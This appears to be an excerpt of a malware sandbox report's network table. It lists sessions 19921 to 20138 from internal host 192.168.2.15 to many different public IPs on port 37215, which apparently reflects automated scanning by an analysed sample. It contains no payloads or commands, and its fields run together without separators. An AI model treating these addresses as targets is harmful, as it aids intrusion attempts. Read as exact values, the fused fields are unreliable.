                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19921192.168.2.154154894.55.170.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19922192.168.2.154470831.97.114.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19923192.168.2.154478631.135.22.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19924192.168.2.1551878102.239.69.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19925192.168.2.154797894.231.16.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19926192.168.2.1556328222.162.36.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19927192.168.2.1546780181.22.232.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19928192.168.2.1548646138.36.254.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19929192.168.2.1536936190.178.38.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19930192.168.2.1538466222.35.213.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19931192.168.2.154388237.17.78.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19932192.168.2.1550492156.32.9.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19933192.168.2.155391645.21.116.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19934192.168.2.154884237.8.132.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19935192.168.2.1551828157.212.249.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19936192.168.2.1557560186.240.0.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19937192.168.2.154906245.98.62.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19938192.168.2.1546486190.97.159.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19939192.168.2.1533204122.61.67.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19940192.168.2.1547516181.177.65.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19941192.168.2.155702037.34.95.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19942192.168.2.1541340222.24.136.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19943192.168.2.1536358222.242.253.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19944192.168.2.1537378197.7.237.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19945192.168.2.1550968181.149.4.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19946192.168.2.154584894.80.236.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19947192.168.2.1540188181.226.50.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19948192.168.2.1542034121.117.101.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19949192.168.2.153313431.115.226.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19950192.168.2.155758845.10.112.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19951192.168.2.1553488181.129.31.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19952192.168.2.1533338156.247.113.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19953192.168.2.1558618121.115.25.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19954192.168.2.1548866222.55.200.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19955192.168.2.1559968165.226.160.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19956192.168.2.15393769.10.51.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19957192.168.2.153611637.187.45.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19958192.168.2.1539348197.123.174.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19959192.168.2.153588637.57.186.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19960192.168.2.1539440121.143.201.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19961192.168.2.154145241.193.211.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19962192.168.2.1539686121.57.68.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19963192.168.2.155374694.163.47.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19964192.168.2.1549464122.235.100.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19965192.168.2.1551982121.194.67.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19966192.168.2.1547366138.35.172.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19967192.168.2.154200432.128.1.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19968192.168.2.153564041.213.34.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19969192.168.2.1540346121.158.8.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19970192.168.2.154990645.183.219.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19971192.168.2.154920631.249.237.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19972192.168.2.1560618102.167.149.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19973192.168.2.153349437.252.161.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19974192.168.2.1534912122.70.96.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19975192.168.2.1534330122.69.32.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19976192.168.2.1534576190.38.180.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19977192.168.2.153596831.64.160.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19978192.168.2.1547966122.36.186.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19979192.168.2.155856045.143.163.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19980192.168.2.1549196220.235.146.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19981192.168.2.1540392197.119.176.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19982192.168.2.155338031.198.123.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19983192.168.2.156093445.64.246.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19984192.168.2.1546842122.212.168.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19985192.168.2.1548508190.237.87.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19986192.168.2.1533154197.89.96.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19987192.168.2.1539090181.154.34.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19988192.168.2.155202031.231.66.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19989192.168.2.153484245.69.43.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19990192.168.2.1548418121.240.72.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19991192.168.2.1545050121.111.75.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19992192.168.2.1552336190.58.158.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19993192.168.2.1551380122.143.230.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19994192.168.2.154080841.170.92.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19995192.168.2.155006231.50.113.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19996192.168.2.153356641.131.240.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19997192.168.2.1546548222.235.54.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19998192.168.2.1548330156.166.111.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19999192.168.2.1534904222.156.32.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20000192.168.2.155581841.57.25.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20001192.168.2.154378445.156.207.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20002192.168.2.1552546186.94.137.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20003192.168.2.1549740156.74.235.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20004192.168.2.1557540122.18.56.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20005192.168.2.1556102186.1.86.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20006192.168.2.1533470156.81.233.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20007192.168.2.155551641.208.243.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20008192.168.2.154519820.147.19.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20009192.168.2.155639441.255.219.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20010192.168.2.1554206102.131.34.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20011192.168.2.1553386156.245.205.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20012192.168.2.1547338157.80.12.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20013192.168.2.1539308186.4.76.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20014192.168.2.1560034186.192.42.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20015192.168.2.155717837.27.137.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20016192.168.2.155512237.168.227.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20017192.168.2.1553146190.245.195.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20018192.168.2.1557676138.84.6.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20019192.168.2.1538340138.254.16.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20020192.168.2.154144480.224.72.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20021192.168.2.154487437.22.21.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20022192.168.2.1540100102.61.130.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20023192.168.2.1558546121.169.165.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20024192.168.2.155378637.1.101.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20025192.168.2.154386637.5.84.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20026192.168.2.1554854181.118.119.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20027192.168.2.1538454181.39.10.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20028192.168.2.153700031.219.24.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20029192.168.2.1542828138.156.224.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20030192.168.2.155163831.112.49.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20031192.168.2.153818837.49.254.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20032192.168.2.1536630156.23.129.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20033192.168.2.1553418222.184.31.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20034192.168.2.1553492156.111.109.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20035192.168.2.1539912157.86.121.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20036192.168.2.1549228138.123.117.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20037192.168.2.1536888157.135.83.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20038192.168.2.1559122197.114.27.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20039192.168.2.1554992222.186.52.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20040192.168.2.1558886102.6.35.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20041192.168.2.1556602181.203.82.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20042192.168.2.153718824.148.82.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20043192.168.2.1553508102.105.224.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20044192.168.2.1541242190.155.37.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20045192.168.2.153626037.52.120.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20046192.168.2.155923841.42.137.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20047192.168.2.1555570197.153.177.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20048192.168.2.154383294.180.20.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20049192.168.2.1551834186.66.78.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20050192.168.2.1542124138.72.181.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20051192.168.2.1555696186.162.50.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20052192.168.2.1542474102.134.37.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20053192.168.2.1543856181.6.124.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20054192.168.2.1550146138.209.37.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20055192.168.2.1542534197.44.87.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20056192.168.2.1542594102.100.27.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20057192.168.2.1535954222.90.207.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20058192.168.2.154469637.65.199.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20059192.168.2.155834694.225.75.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20060192.168.2.1553462156.69.180.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20061192.168.2.1545522157.97.210.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20062192.168.2.1550208186.11.11.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20063192.168.2.1541478122.90.155.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20064192.168.2.1544234186.109.64.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20065192.168.2.154587294.88.215.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20066192.168.2.1549596138.92.141.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20067192.168.2.154421694.173.218.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20068192.168.2.1548488102.201.33.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20069192.168.2.1546072222.134.104.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20070192.168.2.155950641.184.137.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20071192.168.2.1539904157.68.56.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20072192.168.2.1542788102.64.172.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20073192.168.2.1535494181.26.234.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20074192.168.2.154838445.57.255.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20075192.168.2.154403437.63.120.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20076192.168.2.1534476157.6.32.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20077192.168.2.1557906138.91.216.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20078192.168.2.1559254121.125.135.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20079192.168.2.154067431.238.9.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20080192.168.2.155885841.46.38.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20081192.168.2.155747837.225.222.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20082192.168.2.1540334122.102.239.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20083192.168.2.1559862122.153.124.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20084192.168.2.154872041.88.7.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20085192.168.2.153532031.143.243.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20086192.168.2.155208841.83.40.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20087192.168.2.1559508156.108.159.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20088192.168.2.155322045.175.126.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20089192.168.2.1553196156.34.168.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20090192.168.2.1544742190.78.233.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20091192.168.2.1542178186.223.23.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20092192.168.2.1538616190.20.111.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20093192.168.2.1538868121.27.159.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20094192.168.2.1542530173.225.41.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20095192.168.2.1556956190.26.102.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20096192.168.2.1559876156.15.47.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20097192.168.2.1555036190.208.221.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20098192.168.2.154225637.54.133.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20099192.168.2.1542038138.20.163.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20100192.168.2.1540814181.207.160.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20101192.168.2.153983241.61.228.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20102192.168.2.1550002186.190.84.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20103192.168.2.153975231.109.23.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20104192.168.2.1533528121.245.89.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20105192.168.2.153778641.229.122.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20106192.168.2.1552762102.111.109.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20107192.168.2.154147838.134.110.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20108192.168.2.1533786122.244.167.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20109192.168.2.1541828156.115.82.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20110192.168.2.1560130102.188.30.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20111192.168.2.1554262186.213.54.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20112192.168.2.1535872121.52.207.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20113192.168.2.1549620156.181.79.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20114192.168.2.1537534138.218.161.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20115192.168.2.154679645.76.52.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20116192.168.2.1537026121.7.185.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20117192.168.2.154966431.240.85.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20118192.168.2.1549056156.216.156.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20119192.168.2.154717431.149.14.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20120192.168.2.1551112197.144.93.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20121192.168.2.1555404197.148.55.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20122192.168.2.155678837.141.6.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20123192.168.2.153531837.69.73.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20124192.168.2.1556210186.108.211.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20125192.168.2.1549574186.49.178.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20126192.168.2.1554640186.20.188.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20127192.168.2.1552712157.91.241.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20128192.168.2.1553974138.45.13.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20129192.168.2.1558922157.174.136.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20130192.168.2.1552554102.15.23.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20131192.168.2.153374474.81.246.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20132192.168.2.1543474190.207.150.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20133192.168.2.1536520102.129.71.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20134192.168.2.1560926122.123.10.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20135192.168.2.154657045.229.13.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20136192.168.2.153541231.173.244.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20137192.168.2.1544084157.139.186.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20138192.168.2.153446037.23.71.11237215
                                              TimestampBytes transferredDirectionData


